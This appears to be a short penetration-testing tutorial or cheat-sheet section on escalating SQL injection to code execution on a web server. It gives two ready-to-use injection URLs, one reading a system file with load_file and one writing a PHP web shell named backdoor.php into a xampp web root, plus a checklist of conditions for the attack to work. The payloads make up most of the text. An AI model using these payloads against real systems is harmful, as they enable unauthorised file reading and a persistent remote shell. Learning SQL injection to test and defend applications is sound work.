Code Execution Via Injection

Depending on the extent of the vulnerability, SQL injection can be used to execute commands on the remote system. The vulnerability depends on the operating system, service privileges and filesystem permissions.

This is an example to read a file from the filesystem,

http://192.168.1.1/pricelist.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

This is an example to write a file into the xampp directory,

http://192.168.1.1/pricelist.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

Few things you need to know before using the above example,

  • The Operating System in order to be able to write into a specific directory path

  • The webserver and its meta information

  • The installation/www directory of the webserver that is serving the pages

  • Whether DB user has the privilege to write the file in that directory

Last updated